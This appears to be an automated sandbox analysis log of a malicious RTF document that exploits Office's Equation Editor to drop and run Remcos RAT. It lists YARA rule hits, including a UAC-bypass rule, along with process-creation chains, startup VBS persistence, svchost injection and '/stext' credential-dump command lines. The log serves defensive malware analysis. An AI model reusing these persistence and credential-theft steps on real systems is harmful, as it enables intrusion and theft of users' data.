Source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: bhv41C2.tmp.9.dr Binary or memory string: org.slneighbors
Source: classification engine Classification label: mal100.rans.phis.troj.spyw.expl.evad.winRTF@20/22@1/3
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5A0F4 GetLastError,FormatMessageW, 5_2_00D5A0F4
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D484F3 AdjustTokenPrivileges,CloseHandle, 5_2_00D484F3
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D48AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 5_2_00D48AA3
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013E84F3 AdjustTokenPrivileges,CloseHandle, 6_2_013E84F3
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013E8AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 6_2_013E8AA3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 7_2_0041798D
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5B3BF SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 5_2_00D5B3BF
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D6EF21 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 5_2_00D6EF21
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D684D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 5_2_00D684D0
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00CF4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 5_2_00CF4FE9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 7_2_0041AADB
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$5Gv13cOQ.rtf Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-FI789R
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR7879.tmp Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Source: C:\Windows\SysWOW64\svchost.exe System information queried: HandleInformation Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: svchost.exe, 00000007.00000002.854957272.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.385921207.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: WC5Gv13cOQ.rtf ReversingLabs: Detection: 52%
Source: WC5Gv13cOQ.rtf Virustotal: Detection: 50%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\taskhostw.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\siqmroydgnmmmfpuczimwafbeumewarjhx"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ckvxrh"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\feapszuyi"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\taskhostw.exe "C:\Users\user\AppData\Roaming\taskhostw.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Roaming\taskhostw.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\taskhostw.exe" Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\siqmroydgnmmmfpuczimwafbeumewarjhx" Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ckvxrh" Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\feapszuyi" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ntmarta.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: shcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ucrtbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: shcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winnsi.dll Jump to behavior
